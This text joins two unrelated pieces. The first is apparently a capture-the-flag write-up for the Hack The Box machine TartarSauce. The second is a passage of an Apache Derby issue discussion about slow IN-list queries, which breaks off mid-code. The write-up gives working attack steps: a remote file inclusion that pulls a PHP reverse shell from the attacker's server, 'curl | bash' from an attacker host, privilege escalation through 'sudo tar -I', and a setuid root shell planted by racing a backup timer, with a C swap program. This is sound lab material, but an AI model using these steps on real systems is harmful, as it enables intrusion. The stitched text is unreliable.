Note that entries in the robots.txt file don’t “hide” pages/directories. While they indicate to crawlers what you want and don’t want to have indexed, they are a) only an advisory and not a technically imposed rule, and b) can give an attacker a first idea of what you don’t want exposed or have removed from public search engines.
Let’s start by visiting the root path of 10.10.10.88:
Nothing interesting to see here except some ascii art and a little troll at the end of the page source after hundreds of line feeds:
<!--Carry on, nothing to see here :D-->.
Let’s start a directory brute-force of
/ and
/webservices while going through the list of disallowed robots.txt entries:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u
Out of the five paths listed in robots.txt, only
/webservices/monstra-3.0.4/ is available.
Monstra is a Content Management System written in PHP, apparently no longer under active development, and the version it displays has several known security vulnerabilities. Running searchsploit monstra in Kali shows "(Authenticated) Arbitrary File Upload / Remote Code Execution" as the most promising weakness related to this version.
As it requires prior authentication, let's head to the Monstra admin login and attempt a login with common credentials. admin/admin as user/password works right off the bat and we're inside the admin interface.
Examining the potential exploit (searchsploit -x 43348), it looks like a simple file upload could give us remote code execution via PHP. Trying it out, however, we quickly find the upload functionality does not work for any file, and we can see that doing any kind of modification in the admin panel leads to errors as well (e.g. modifying a template).
The vulnerability does not seem to be exploitable, even though in theory it should be. I like this, because it reflects a very common situation in real life, where vulnerabilities exist, but cannot be exploited due to the presence of certain configurations or just lucky circumstances.
But, looking at the gobuster results from the directory brute-force started earlier, we have found another promising candidate: /webservices/wp. It shows a rather empty WordPress installation, but as it's often abandoned software that lets you in, let's start enumerating it.
Having a look at WordPress' default directories, we see that browsing them is a bit tedious, as it seems the base URL of the site is misconfigured (missing a slash after http:/).
While we could manually correct all HTTP requests through an intercepting proxy, there’s a nice trick to do it automatically in Burp.
Going to Options in the Proxy tab, we can add a rule under Match and Replace and tell it to replace GET /10.10.10.88/webservices in the request header with GET /webservices. Similarly, we could do this for other methods and headers as well.
Now we can browse the site regularly through the Burp proxy.
Unfortunately, we’re not lucky with weak credentials this time, and even notice a delay in processing the login requests to prevent brute-forcing.
As Wordpress security is often compromised using third-party plugins, let’s have a look at WPScan to enumerate plugins:
wpscan --url -e ap --plugins-detection aggressive
(Using aggressive detection as passive/mixed did not yield results)
[i] Plugin(s) Identified:

[+] akismet
 | Location:
 | Last Updated: 2019-11-13T20:46:00.000Z
 | Readme:
 | [!] The version is out of date, the latest version is 4.1.3
 |
 | Found By: Known Locations (Aggressive Detection)
 |  -, status: 200
 |
 | Version: 4.0.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  -
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  -

[+] brute-force-login-protection
 | Location:
 | Latest Version: 1.5.3 (up to date)
 | Last Updated: 2017-06-29T10:39:00.000Z
 | Readme:
 |
 | Found By: Known Locations (Aggressive Detection)
 |  -, status: 403
 |
 | Version: 1.5.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  -
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  -

[+] gwolle-gb
 | Location:
 | Last Updated: 2019-10-25T15:26:00.000Z
 | Readme:
 | [!] The version is out of date, the latest version is 3.1.7
 |
 | Found By: Known Locations (Aggressive Detection)
 |  -, status: 200
 |
 | Version: 2.3.10 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  -
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  -
Going through these and researching past vulnerabilities, we find a potential Remote File Inclusion vulnerability in gwolle-gb, albeit for a different version.
As it’s a very easy exploit, let’s try it anyway.
First shell
We create a file wp-load.php in a directory on our machine and add code for a PHP reverse shell. I chose the shell from SecLists, present at seclists/Web-Shells/laudanum-0.8/php/php-reverse-shell.php.
After changing the IP to our own and the port to one of choice, we can launch a webserver from the directory of our wp-load.php file (python3 -m http.server 80), spin up a netcat listener (nc -lvnp <port>), and then navigate to the vulnerable plugin URL with <our IP>/ as the remote include path.
It works and we get our first shell as www-data. The version information in the readme.txt that WPScan read was thus false information.
Privilege escalation to user
To get a nicer shell, let's quickly do a python3 -c 'import pty; pty.spawn("/bin/bash")' followed by backgrounding, stty raw -echo and foregrounding again (check the blog post "Upgrading Simple Shells to Fully Interactive TTYs" at blog.ropnop.com for details about this trick).
One of the first things to check once we get an initial foothold is – amongst other things – see if we can execute commands as another user. In this case, we can:
www-data@TartarSauce:/$ sudo -l
Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar
Being able to run tar as the user onuma probably means we can easily escalate to that user:

$ sudo -u onuma /bin/tar xf /dev/null -I '/bin/sh -c "sh <&2 1>&2"'
$ id
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
The reason this works is that -I allows us to specify a custom compression program (-I is short for --use-compress-program). It is not the only method of abusing tar for privilege escalation, though; have a look at the GTFOBins page for tar.
Getting root
With our new permissions, we can run an enumeration script to get an overview of the system. We can host LinEnum on our machine (e.g. python3 -m http.server 80) and then load it and pipe it into bash in the onuma shell:
curl | bash
Amongst other things we see a couple of files related to some kind of backup and more specifally a systemd timer:
[-] Systemd timers:
NEXT                         LEFT           LAST                         PASSED        UNIT              ACTIVATES
Sun 2020-02-09 17:08:42 EST  3min 24s left  Sun 2020-02-09 17:03:42 EST  1min 35s ago  backuperer.timer  backuperer.service
There are also a few other (false?) hints, e.g. a comment in .bashrc:
# add alias so i don't have to type root's super long password everytime i wanna switch to root :D"
I couldn't find any clue to these, so let's go on with finding out more about the backuperer.service and the related timer.
systemd timers are a way to start services based on time, similar to cron. We can find the configuration of "backuperer" in /etc/systemd/system/multi-user.target.wants/backuperer.timer or /lib/systemd/system/backuperer.timer, respectively.
backuperer.timer:
[Unit]
Description=Runs backuperer every 5 mins

[Timer]
# Time to wait after booting before we run first time
OnBootSec=5min
# Time between running each consecutive time
OnUnitActiveSec=5min
Unit=backuperer.service

[Install]
WantedBy=multi-user.target
And the service backuperer.service in /lib/systemd/system/backuperer.service:

[Unit]
Description=Backuperer

[Service]
ExecStart=/usr/sbin/backuperer
And, finally, the contents of /usr/sbin/backuperer:

#!/bin/bash
# [...]
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72); do /usr/bin/printf $"-"; done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check

if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi
We can see that the script does – more or less – the following:
1. Removes dot files from /var/tmp, plus the /var/tmp/check folder.
2. Zips/archives the contents of /var/www/html as user onuma into a file in /var/tmp with a random name beginning with a dot.
3. Sleeps for 30 seconds.
4. Creates the directory /var/tmp/check.
5. Extracts the previously archived contents as root into the /var/tmp/check directory.
6. Performs a diff of /var/www/html against /var/tmp/check/var/www/html.
7. If the check in 6 reports differences, it just writes an error log, but leaves the files. If no differences are reported, or if the diff command errors out (for example, because the directory doesn't exist), it moves the archive file into /var/backups and then removes the /var/tmp/check directory and dot file.
If we are able to replace the tar-gzipped file with our own malicious one in the timeframe of step 3 (sleep 30), include in our archive an executable owned by root with the setuid bit set, and leave the directory structure intact (we want a diff that succeeds but reports differences), then tar should extract our file with permissions and attributes preserved, and the script should not move or delete anything. After that we can enter the check directory and execute our file to get a root shell. Let's give it a shot:
- Create a simple C program on our machine that will spawn a bash shell (and keep effective user id):
#include <stdio.h>
#include <unistd.h>

int main (void)
{
    char *argv[] = { "/bin/bash", "-p", NULL };
    execve(argv[0], argv, NULL);
}
- Compile for the target machine: gcc -m32 shell.c -o shell
- Add the setuid bit: chmod +s shell (the owner is already root (0) as we're on a Kali machine)
- Make the directory structure (still on our machine): mkdir -p var/www/html
- Move our executable into the directory: mv shell var/www/html/
- Tar the whole thing up: tar -zcvf shell.tar.gz var/
Now that we have our shell.tar.gz file, we can transfer it over to the target machine (e.g. via an HTTP server as above) and place it into, e.g., /var/tmp.
With systemctl list-timers, we can see when our window of opportunity will open (as soon as LEFT goes to 0):

NEXT                         LEFT      LAST                         PASSED       UNIT              ACTIVATES
Mon 2020-02-10 10:52:38 EST  56s left  Mon 2020-02-10 10:47:38 EST  4min 3s ago  backuperer.timer  backuperer.service
Once the backuperer script runs and we can see the temp file in /var/tmp, we'll replace it with our shell.tar.gz (cp shell.tar.gz .<random name>). A few seconds later, if everything went fine, we should find the check folder with our setuid binary in it.
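The replace-in-the-window step can also be scripted rather than raced by hand. Below is a hedged sketch in plain C (the directory, file names and polling interval are assumptions for illustration, not taken from the box): it polls a directory until the backup's temporary dot-file appears, then overwrites it with our payload archive.

```c
/* watch_and_swap.c - hedged sketch of automating the copy-in-the-window
 * step: poll a directory until the backup's dot-file appears, then
 * overwrite it with our payload archive. */
#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Copy src over dst byte by byte; returns 0 on success. */
static int copy_over(const char *src, const char *dst) {
    FILE *in = fopen(src, "rb"), *out = fopen(dst, "wb");
    if (!in || !out) { if (in) fclose(in); if (out) fclose(out); return -1; }
    int c;
    while ((c = fgetc(in)) != EOF) fputc(c, out);
    fclose(in); fclose(out);
    return 0;
}

/* Poll dir for a dot-file (the backup temp archive) and replace it with
 * payload; returns 1 on success, 0 if nothing appeared in max_polls. */
int swap_dotfile(const char *dir, const char *payload, int max_polls) {
    char target[4096];
    for (int i = 0; i < max_polls; i++) {
        DIR *d = opendir(dir);
        if (!d) return 0;
        for (struct dirent *e; (e = readdir(d)) != NULL; ) {
            if (e->d_name[0] == '.' && strcmp(e->d_name, ".") != 0 &&
                strcmp(e->d_name, "..") != 0) {
                snprintf(target, sizeof target, "%s/%s", dir, e->d_name);
                closedir(d);
                return copy_over(payload, target) == 0;
            }
        }
        closedir(d);
        sleep(1);  /* short nap before the next poll */
    }
    return 0;
}
```

On the box this would be pointed at /var/tmp with the path to shell.tar.gz, started shortly before the timer fires; note it naively grabs the first dot-file it sees.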
Now we still have a couple of minutes left to execute the binary in /var/tmp/check/var/www/html, which gives us a root bash shell:
onuma@TartarSauce:/var/tmp/check/var/www/html$ ls
shell
onuma@TartarSauce:/var/tmp/check/var/www/html$ ./shell
bash-4.3# id
uid=1000(onuma) gid=1000(onuma) euid=0(root) egid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(onuma)
bash-4.3# whoami
root
Cheers!
I hope you’ve enjoyed this write-up. If you have any questions, did it another way or have something else to say, feel free to leave a comment. I’m always happy to learn new things. You can also check out the other write-ups. | https://davidhamann.de/2020/02/10/htb-writeup-tartarsauce/ | CC-MAIN-2020-10 | refinedweb | 2,322 | 54.93 |
Details
Description
Issue Links
- is cloned by:
- is related to:
  - DERBY-4376 Simple select runs forever (Closed)
- relates to:
  - DERBY-3061 Wrong results from query with two conjuncts (Closed)
  - DERBY-2500 Assertion failure preparing query with AND and OR in where clause (Closed)
  - DERBY-2740 LIKE parameter marker combined with index multi-probing leads to ASSERT failure with sane jars, wrong results with insane jars. (Closed)
  - DERBY-3253 NullPointer Exception (NPE) from query with IN predicate containing two values and joining a view with a large table. ERROR 38000: The exception 'java.lang.NullPointerException' was thrown while evaluating an expression. (Closed)
  - DERBY-3279 Derby 10.3.X ignores ORDER BY DESC when target column has an index and is used in an OR clause or an IN list. (Closed)
  - DERBY-6045 in list multi-probe by primary key not chosen on tables with >256 rows (Closed)
  - DERBY-6226 enhance optmizer to use multiple probes into multiple indexes to satisfy OR queries on different columns. (Open)
  - DERBY-6784 change optimizer to choose in list multiprobe more often (Open)
I have evidence (presented below) that the query optimizer is making some very poor choices when deciding how to make use of the available indexes. Unfortunately, this is making Derby unusable for the application I'm working on.
Clearly, the Derby engine is fundamentally capable of executing queries in a sensible amount of time, but the query optimizer appears to get confused if there are several indexes to choose from and multiple references to the same column in the WHERE clause.
In my previous, comment I gave details of simple example that demonstrated the problem. To recap, I am executing variants of the following SQL against a relatively simple table:
SELECT ObjectId, SUM(WordLocation) AS Score
FROM tblSearchDictionary
WHERE Word = 'CONTACT' OR Word = 'ADD'
GROUP BY ObjectId;
It makes no difference to the query performance or query plan if the WHERE clause is as above, or is re-written as:
WHERE Word IN ('CONTACT', 'ADD')
– ORIGINAL RESULTS: –
The timings with the schema described in my previous comment are:
Matching one term: ~200ms avg.
Matching two terms: ~10000ms avg.
The "matching one term" timings are with the following WHERE clause:
WHERE Word = 'CONTACT'
(searching just for 'ADD' gives similar timings).
The "matching two terms" timings are with the following WHERE clause:
WHERE Word = 'CONTACT' OR Word = 'ADD'
The query plans for these timings can be found in my previous comment.
With some suggestions from the derby-users list, I have attempted to redefine the indexes on the table to see if that will have any effect on the choices made by the query planner.
Dropping all the column indexes and then reordering the unique constraint so that the most varying column is first, and the least varying last, caused the query planner to change its plan to use the index backing the unique constraint to match the terms.
DROP INDEX TBLSEARCHDICTIONARYOBJECTID;
DROP INDEX TBLSEARCHDICTIONARYOBJECTTYPE;
DROP INDEX TBLSEARCHDICTIONARYWORD;
DROP INDEX TBLSEARCHDICTIONARYWORDLOCATION;
ALTER TABLE TBLSEARCHDICTIONARY DROP UNIQUE CONSd0e222;
ALTER TABLE TBLSEARCHDICTIONARY ADD CONSTRAINT CONSd0e222 UNIQUE
(ObjectId,Word,WordLocation,ObjectType);
However from the results you can see that the search for a single term suffered a big loss in performance.
– RESULTS WITH OPTIMIZED CONSTRAINT: –
Matching one term: ~4000ms avg.
Matching two terms: ~600ms avg.
I have attached the relevant query plans for each of these results.
This is a very surprising result: matching one term performs far worse than matching two.
In an attempt to remedy problem of the poor single term performance, I re-introduced the index to the Word column with the following schema change:
CREATE INDEX tblSearchDictionaryWord ON tblSearchDictionary (Word );
– RESULTS WITH OPTIMIZED CONSTRAINT AND INDEX ON WORD FIELD: –
Matching one term: ~200ms avg.
Matching two terms: ~4500 ms avg.
Again, I have attached the relevant query plans.
Although the additional index is used in the single term query, it can be seen that adding the additional index has the effect of causing the planner to get confused about which indexes to use for the two term case. The plan here shows an index scan of both indexes, resulting in an average time seven times worse than before.
I should add here that replacing the WHERE OR clause for the two term query with an IN() produces exactly the same plan and results, which is what one would expect based on the Derby documentation's description of how the optimizer re-writes WHERE OR clauses.
It seems to me that the optimizer is broken when processing WHERE clauses with OR and WHERE clauses with IN. The engine is obviously capable of executing my example in a reasonable time, but the planner's choices let it down. This causes significant problems in large applications with many complex queries, particularly where the number of terms in an IN clause varies, as it then becomes almost impossible to construct queries that execute with reliably acceptable performance.
It may be interesting to note that the application I'm working on also can also use Mckoi or SQL Server 2000. Both the single and double term searches execute with acceptable performance with both of those database engines.
–
Kevin Hore

(attached: query plan for matching two terms in a table that contains only the revised unique index)
Is it possible to contribute a test case with data that I can quickly setup to try on my machine? Make sure your data is sharable (to the whole world!). I do see some numbers here that I don't understand how it is possible, especially the case of two terms being faster than one. I would like to confirm if because of possible page cache and/or other suspects I have.
I'll try to schedule some time for one of our engineers to contribute a test case with data. We're in the middle of a release cycle right now, so it might not be done straight away. Thank you for your interest.
I spent much of last week tracking down a performance problem in an application that I'm working on, and it turned out to be described here.
I developed a test application (that I will attach) that explores different ways of doing essentially this query:
SELECT * FROM myTable WHERE foreignKeyColumn IN (?, ..., ?)
We tried the following strategies:
Literals - 1 query, using WHERE column IN ('literal1', ..., 'literalN')
Literal - N queries, using WHERE column = 'literal[i]'
Markers - 1 query, using WHERE column IN (?, ..., ?)
Marker - N queries, using WHERE column = ?
TempTable - 1 query, store parameters in a temp table, use nested select, then delete parameters
ScratchPad - 1 query, store parameters in a table, use nested select, then delete parameters
ScrSavepoint - 1 query, set savepoint, store parameters in a table, use nested select, then rollback savepoint
We were astonished to find that converting the query to:
SELECT * FROM myTable WHERE foreignKeyColumn = ?
And repeating that query N times was by far the best performer out of 7 different strategies I tried. (This is what I call the Marker strategy above.)
Here are the results for a table with 100,000 rows in it, and then after that for 1,000,000 rows:
(Note: this table is tab delimited, for easy importing into Excel. I'll also attach this data.)
Literals Literal Markers Marker TempTable ScratchPad ScrSavepoint
ID Count Total ms Avg ms Total ms Avg ms Total ms Avg ms Total ms Avg ms Total ms Avg ms Total ms Avg ms Total ms Avg ms
1 20 20 10 10 10 10 0 0 1232 1232 1132 1132 1022 1022
2 881 440 20 10 450 225 0 0 1022 511 1041 520 1042 521
3 1051 350 30 10 2794 931 0 0 1022 340 1022 340 1012 337
4 1012 253 40 10 2013 503 0 0 1032 258 1002 250 1202 300
5 1132 226 40 8 2053 410 0 0 1032 206 1022 204 1042 208
6 1042 173 50 8 1523 253 0 0 1012 168 1022 170 1051 175
7 1132 161 60 8 3145 449 0 0 1022 146 1032 147 1112 158
8 1102 137 60 7 3034 379 10 1 1062 132 1202 150 1082 135
9 1102 122 60 6 2965 329 0 0 1142 126 1151 127 992 110
10 1112 111 70 7 3526 352 0 0 1022 102 1052 105 1062 106
20 1142 57 120 6 3746 187 10 0 1022 51 1112 55 1232 61
30 1317 43 195 6 4117 137 10 0 1022 34 1082 36 1072 35
40 1252 31 250 6 4417 110 20 0 1022 25 1091 27 1282 32
50 1292 25 320 6 4777 95 20 0 1062 21 1052 21 1052 21
60 1327 22 350 5 5068 84 20 0 1062 17 1082 18 1112 18
70 1332 19 415 5 5504 78 30 0 1042 14 1142 16 1081 15
80 1327 16 471 5 5769 72 40 0 1041 13 1052 13 1277 15
90 1362 15 481 5 6330 70 40 0 1052 11 1152 12 1092 12
100 1372 13 536 5 6460 64 40 0 1283 12 1092 10 1202 12
=============================================================================================================================
Literals Literal Markers Marker TempTable ScratchPad ScrSavepoint
ID Count Total ms Avg ms Total ms Avg ms Total ms Avg ms Total ms Avg ms Total ms Avg ms Total ms Avg ms Total ms Avg ms
1 160 160 70 70 40 40 41 41 69841 69841 44261 44261 36699 36699
2 44120 22060 181 90 222124 111062 0 0 8624 4312 6851 3425 6580 3290
3 10958 3652 120 40 12540 4180 10 3 6461 2153 6431 2143 6520 2173
Updated the performance test with 3 join queries, to compare with the 3 nested queries (the joins perform much better).
Note that there is a Wiki page related to this issue:
I'm (finally) preparing to work on this issue. I have a general approach, which is to replace the IN LIST with an IN (sub-query-of-single-column-VirtualTable), but also some open questions.
The basic question is "when" should I replace the IN predicate? The two basic choices would seem to be during preprocessing or during getNextDecoratedPermutation. The former would likely be simpler to implement, but would my force solution to always be used (which, given the poor cost estimates produced due to this bug, might be a good thing). The latter would require replacing the Optimizable against which the IN predicate is being evaluated with a substitute that represents a nested join (probably). I really don't have enough of a grasp of the sub-query optimization to know whether that is a good idea or not..
I assume that the activation object passed to the VTI constructor in VTIResultSet.opencore is where I would get the values for the parameters.
I'm currently looking to add the following if/else branch to InListOperatorNode:
    else if ((leftOperand instanceof ColumnReference) &&
             rightOperandList.containsAllConstantOrParameterNodes())
Are there possible existing temporary table mechanisms that could be used instead of relying on VTIs?
I would have thought there are existing cases where a temporary table is built during a query execution and used in subsequent joins.
The concern I have over VTIs is type conversion: VTIs return rows as JDBC types, but the input to the IN list is in terms of internal DataValueDescriptors. If the IN list values could be kept as internal types then I think the solution would be easier.
Of course this could be implemented using VTIs and subsequently improved to use an internal table type (language ResultSet implementation), but I wonder if that approach will lead to unnecessary work.
Even if an existing table type is not used, I wonder if it's easier to provide an implementation of Derby's language ResultSet wrapped around a collection of values instead of the JDBC ResultSet doing the same work. Of course with a new language ResultSet there may be more optimization work that one gets for free with a VTI.
language ResultSet = org.apache.derby.iapi.sql.ResultSet
In
DERBY-2152 James wrote:
--------------------
I'm experimenting with transforming a query such as:
SELECT * FROM tableA WHERE columnB IN (constC, ?, ?, constD)
into
SELECT * FROM tableA WHERE columnB IN (SELECT vti.column1 FROM new ArgsToRowsVTI(SomeArgs))
----------------------
Is this a step to solving
DERBY-47, or does re-writing the query this way solve the performance problem?
I'm confused because the new query still uses an IN operator and I don't see any queries like the above as performance experiments (e.g. using another table instead of a VTI).
I was thinking (along with the last comment), if there was a way to re-write the query using something along the lines of a VALUES clause:
SELECT * FROM tableA, TABLE(VALUES constC, ?, ?, constD) AS X(C) WHERE X.C = tableA.columnB;
I think you have to do the same approach for the parameters, build up a collection of valid parameters, though maybe if you limit your solution you can get away with a range. A range does not work in the general case where a single value in the IN list can be composed of multiple parameters, e.g.
IN (?,?,?, ?+?)
With these approaches the amount of information required to create a ResultSet for such an IN list is fixed and not a factor of the number of values, thus leading to smaller generated code to generate the result set.
Dan wrote:
> Is this a step to solving
DERBY-47, or does re-writing the query this way solve the performance problem?
The goal of the re-write is to avoid the source of
DERBY-47, which is that we don't have a multi-probe index scan, only range index scans, and worse still, when there are parameters involved, the range is the entire index.
My intent is that the re-write will send it towards treating this like an exists; for example:
SELECT * FROM tableA
WHERE EXISTS (SELECT 1 FROM new ArgsToRowsVTI(SomeArgs) AS X(C) WHERE tableA.columnB = X.C)
> I was thinking (along with the last comment), if there was a way to re-write the query
> using something along the lines of a VALUES clause.
> SELECT * FROM tableA, TABLE(VALUES constC, ?, ?, constD) AS X(C) WHERE X.C = tableA.columnB;
I tried a similar approach earlier, and found that it wouldn't compile. Perhaps it was the version of Derby
I was testing with, or perhaps I just screwed up the syntax, but putting parameters into the FROM
clause didn't seem to be allowed.
I'm also concerned about the implications of moving the IN list to the FROM clause. Isn't there a risk of changing the semantics?
Dan wrote:
> ... store it as a saved object.
Thanks for the pointer to CompilerContext.addSavedObject, I'd not come across it before.
Do you think that I could "just" pass InListOperatorNode.rightOperandList (a ValueNodeList) to addSavedObject? If so, then the whole process could be much simpler.
> Do you think that I could "just" pass InListOperatorNode.rightOperandList (a ValueNodeList) to addSavedObject?
No. QueryTreeNodes are for compile time and are assumed to be private to a connection. Any saved objects and the entire compiled plan is shared across multiple connections. Holding onto a node in the compiled plan would lead to memory leaks as the nodes contain references to objects of its connection, which could not be gc'ed once the connection is closed if a compiled plan still had references to the nodes.
I think I've found the code that caused a problem for me when I tried using VALUES to construct a table using parameters.
SubqueryNode.bindExpression contains the following:
/* reject ? parameters in the select list of subqueries */
resultSet.rejectParameters();
The syntax I'd used involved replacing an IN list with an IN sub-query, and clearly that would run into the above code.
So, any idea why that code is there?
I've changed InListOperatorNode.preprocess to replace the node with a new SubqueryNode
in the case where the list is all parameter markers. I'll attach the changed file.
To make the SubqueryNode ready for use I need to call bindExpression and preprocess,
and this is failing in bindExpression because it is attempting to rebind the leftOperand
(a ColumnReference) when I don't have the full context of the original binding.
I would seem to have a few choices:
1) Modify ColumnReference.bindExpression so that it detects the rebinding
situation, and returns without doing anything. I don't know if there are cases where
rebinding occurs currently and is supposed to change the binding. Apart from that
uncertainty, this seems like a good choice.
2) Modify SubqueryNode.bindExpression to detect when the leftOperand is a
ColumnReference that is already bound, and skip the leftOperand.bindExpression call.
3) Copy much of the code from SubqueryNode.bindExpression into
InListOperatorNode.preprocess, allowing me to bypass the call to
leftOperand.bindExpression. Definitely ugly, hard to maintain.
4) Create a trivial ColumnReference subclass that has an empty bindExpression
implementation, and "clone" the InListOperatorNode.leftOperand as an instance
of this subclass for use as the SubqueryNode.leftOperand , thus avoiding the
problem.
Any thoughts on the preferred approach?
Added code for replacing the InListOperatorNode with a SubqueryNode (IN_SUBQUERY) in the case where all of the list entries are parameter markers. Not yet working (fails in SubqueryNode.bindExpression, calling leftOperand.bindExpression).
I've been thinking more about the suggestion of using a table constructor.
I was concerned about several issues:
1) When I tried it previously I got this error:
ERROR 42Y10: A table constructor that is not in an INSERT
statement has all ? parameters in one of its columns. For
each column, at least one of the rows must have a non-parameter.
Working around this will require figuring out the type of the parameters,
and creating a dummy value to include in the table, with extra code to
remove it.
2) Re-writing the query by adding the table constructor to the fromList
of the SelectNode that includes the IN list predicate potentially
changes the semantics of the query (for example, imagine the case
where the IN list is OR'd with other predicates). This is why I've been
sticking with a sub-query (which my performance experiments indicated
can perform well).
I tried the table constructor again this morning, coming up with a query
re-write that combines the suggested table constructor with an IN sub-query.
For example, we would transform:
SELECT * FROM tableA
WHERE columnB IN (constC, ?, ?, constD)
into:
SELECT * FROM tableA
WHERE columnB IN (
SELECT v FROM TABLE(
VALUES (dummyValue, 0), (constC, 1), (?, 1), (?, 1), (constD, 1)) AS X(v, k) WHERE k=1)
The sub-query is built up as a tree (really a list) of UNIONs, union-ing together each
row in the VALUES clause.
Unfortunately the performance of this is poor, with a table scan of tableA being performed,
rather than using the index on columnB. I'm investigating why this isn't transformed
into a nested loop join, with the UNION on the outside.
As stated in my previous comment, I've been debugging the compilation of this query:
SELECT * FROM tableA
WHERE columnB IN (
SELECT v FROM TABLE(
VALUES (dummyValue, 0), (constC, 1), (?, 1), (?, 1), (constD, 1)) AS X(v, k) WHERE k=1)
The IN operator is represented with a SubqueryNode of type IN_SUBQUERY.
SubqueryNode.preprocess "tries" to flatten this, but because the sub-query
doesn't select from a single base table, it decides not to flatten it
(i.e. it doesn't hoist it up into its parent query).
As a result, the optimizer isn't presented with a join that it can choose the order of,
but rather just one top-level optimizable, with a sub-query that must be optimized
"separately".
Some success at last...
I forced SubqueryNode.preprocess to flatten the sub-query mentioned
previously by modifying SubqueryNode.singleFromBaseTable to return
true (not a valid change, but it helps with this experiment), which then
enabled the optimizer to re-order the join so that the index on tableA
is used. Yeah!
The performance was quite reasonable.
Possible next steps:
- Consider wrapping the sub-query's SelectNode in a MaterializeResultSetNode (helpful in those cases where the sub-query is invariant, and the sub-query ends up being executed multiple times... that latter is not really known until later in the optimization process)
- Modify SubqueryNode.preprocess so that it can flatten more sub-queries (including the one produced above). Materializing the sub-query could help with the flattening.
- Modify InListOperatorNode.preprocess to produce a sub-query like the one above.
I've spent some time looking at this issue and have come up with a solution that is based on two earlier comments for this issue. Namely:
Comment #1:
> I was thinking (along with the last comment), if there was a way to re-write the query using something along the lines of a VALUES clause.
The solution I've come up with does in fact rewrite IN-list queries to create a join between the target table and "something along the lines of a VALUES clause". That said, though, a VALUES expression in Derby is internally parsed into a chain of nested UNIONs between RowResultSetNodes. I did a quick prototype to duplicate that behavior and found that for IN lists with thousands of values in them, a chain of UNIONs is not acceptable. More specifically, I found that such a chain inevitably leads to stack overflow because of recursion in preprocessing and/or optimization. And even if the list is small enough to avoid stack overflow, the time it takes to optimize a UNION chain with, say, a thousand values is far too long (I was seeing optimization times of over 20 seconds with 1000 IN-list values). And lastly, assuming that we were able to code around stack overflow and optimization time, the limit to the size of a UNION chain that Derby can successfully generate is far less than the current limit on IN-lists--see DERBY-1315 for the details--which means we would have to skip the rewrite when the list has more than xxx values. That's doable, but not pretty.
So in my proposed solution we do not actually create a normal VALUEs expression. Instead we create a new type of node called an "InListResultSetNode" that is specifically designed to handle potentially large lists of constant and/or parameter values. Then we create a new equality predicate to join the InListRSN with the appropriate table, and since InListResultSetNode is an instance of Optimizable, the optimizer can then use the predicate to optimize the join.
Note that I also made changes to the optimizer so that it recognizes InListResultSetNodes as "fixed outer tables", meaning that they are prepended to the join order and remain fixed at their prepended positions throughout the optimization process. This ensures that the optimizer does not have to deal with additional join orders as a result of the IN-list rewrite (it already looks at too many; see DERBY-1907).
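The stack-overflow behavior described above is easy to reproduce in miniature: any recursive traversal of a deeply nested chain of nodes (which is how a UNION chain is walked during preprocessing and optimization) fails once the chain is long enough. This is a standalone sketch, not Derby code; the Node class simply stands in for a chain of nested UNION nodes:

```java
public class UnionChainSketch {
    // A minimal stand-in for a chain of nested UNION nodes: each node has one child.
    static final class Node {
        final Node child;
        Node(Node child) { this.child = child; }
    }

    // Build a chain of the given depth iteratively (this part never overflows).
    static Node chain(int depth) {
        Node n = null;
        for (int i = 0; i < depth; i++) n = new Node(n);
        return n;
    }

    // Recursive traversal, as a tree-walking preprocess/optimize phase would do.
    static int depthOf(Node n) {
        return n == null ? 0 : 1 + depthOf(n.child);
    }

    public static void main(String[] args) {
        System.out.println(depthOf(chain(1000)));    // a small chain is fine
        try {
            depthOf(chain(1_000_000));               // a deep chain blows the Java stack
        } catch (StackOverflowError e) {
            System.out.println("StackOverflowError on a deeply nested chain");
        }
    }
}
```

This is why an IN list with thousands of values cannot simply be rewritten as a VALUES/UNION chain, independent of how long optimization would take.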
Comment #2:
In the solution I've written we do in fact create a "collection of literal values (DataValueDescriptors) at compile time and store it". We do not, however, use saved objects to store/retrieve them. Instead, we use existing code in InListOperatorNode to create an execution time array of DataValueDescriptors and we pass that array to a new execution time result set, InListResultSet, that returns the list of values as a single-column result set. This approach works for both constants and parameters.
By re-using the existing InListOperator code generation we ensure that the max size of an IN-list after these changes will be the same as what it was before these changes.
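The single-column result set idea can be sketched as follows. This is a simplified, hypothetical stand-in: the real InListResultSet implements Derby's internal language ResultSet interface over an array of DataValueDescriptors, not plain Objects:

```java
import java.util.*;

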